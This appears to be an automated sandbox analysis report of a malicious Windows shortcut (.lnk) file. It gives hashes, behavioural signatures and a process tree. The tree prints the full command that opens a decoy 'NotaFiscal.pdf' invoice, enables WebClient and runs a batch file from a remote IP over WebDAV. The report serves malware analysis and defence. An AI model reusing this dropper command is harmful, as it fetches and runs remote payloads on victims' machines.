Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
09/05/2024, 08:32
Static task
static1
Behavioral task
behavioral1
Sample
f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
Resource
win10v2004-20240508-en
General
-
Target
f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
-
Size
2KB
-
MD5
7b5db2de0a2d91a0e6f83080e8dd0d6e
-
SHA1
5a370fa094efe972929d1e6dc604162821da698b
-
SHA256
f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747
-
SHA512
2f816236825717d5aa942898f8320e73883364d76a2fd36c935f9b21f7c034f5176ed2365ff9157e7ccc4e7bbf1b1e1af40c0811619fe481b28fcf0c07f9080c
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation cmd.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4788 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1520 PING.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 576 AcroRd32.exe 576 AcroRd32.exe 576 AcroRd32.exe 576 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4628 wrote to memory of 4136 4628 cmd.exe 84 PID 4628 wrote to memory of 4136 4628 cmd.exe 84 PID 4136 wrote to memory of 576 4136 cmd.exe 85 PID 4136 wrote to memory of 576 4136 cmd.exe 85 PID 4136 wrote to memory of 576 4136 cmd.exe 85 PID 4136 wrote to memory of 4788 4136 cmd.exe 87 PID 4136 wrote to memory of 4788 4136 cmd.exe 87 PID 4136 wrote to memory of 1520 4136 cmd.exe 88 PID 4136 wrote to memory of 1520 4136 cmd.exe 88 PID 576 wrote to memory of 3228 576 AcroRd32.exe 91 PID 576 wrote to memory of 3228 576 AcroRd32.exe 91 PID 576 wrote to memory of 3228 576 AcroRd32.exe 91 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 3888 3228 RdrCEF.exe 92 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93 PID 3228 wrote to memory of 856 3228 RdrCEF.exe 93
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6BA68E202FED590F4D0ADAD4B998D831 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:3888
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=960C94DA004A486474BC592E2E122CF0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=960C94DA004A486474BC592E2E122CF0 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:15⤵PID:856
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1ED06CB5CD063518D0580C70C6F87E90 --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:536
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5BDCF55CB60C80E7169F5DEBF87724C7 --mojo-platform-channel-handle=1788 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4388
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D28DE57619EE3673C642454ACFBEE476 --mojo-platform-channel-handle=2376 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4908
-
-
-
-
C:\Windows\system32\sc.exesc start webclient3⤵
- Launches sc.exe
PID:4788
-
-
C:\Windows\system32\PING.EXEping localhost -n 73⤵
- Runs ping.exe
PID:1520
-
-
C:\Windows\system32\cmd.execmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat3⤵PID:1668
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4396
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5682c99f22249cf9012dda1ea443a4d46
SHA1f60629143f3e423d3c29bafb2b8d0d82ab946cef
SHA25615c3ae29dc7da732d3a1c27b1c62b721825cd1271a8f080f5e1a36936e4fb700
SHA512744132df4e4984d606560d0d48097dc4804013cd54c390fa06d0d18125686144dd7b9bab36d1089038b08363174589bed94418354059540bd7e631a59ff36d7e
-
Filesize
64KB
MD5a11c01620326c7d5b7f69d619bed1e93
SHA137febab24fb31c2ac316d2727ddf0128fd39cc2b
SHA25602134136b79171c0a67664acd59afbc038903045297abae07fb16e6d41443b33
SHA5121846121e3a227908d0b86226ace08d54674840d70f9596dfd394725db9626b3a62a7c52e5e37fa4b3fa019ecca7c23a2439cdc751564968f366fc7b29acd796b
-
Filesize
29B
MD5823a9caa296579d6a40cd5195d969727
SHA15592813787ecff9133229439498d624339c07ece
SHA25660b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e
SHA51277ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc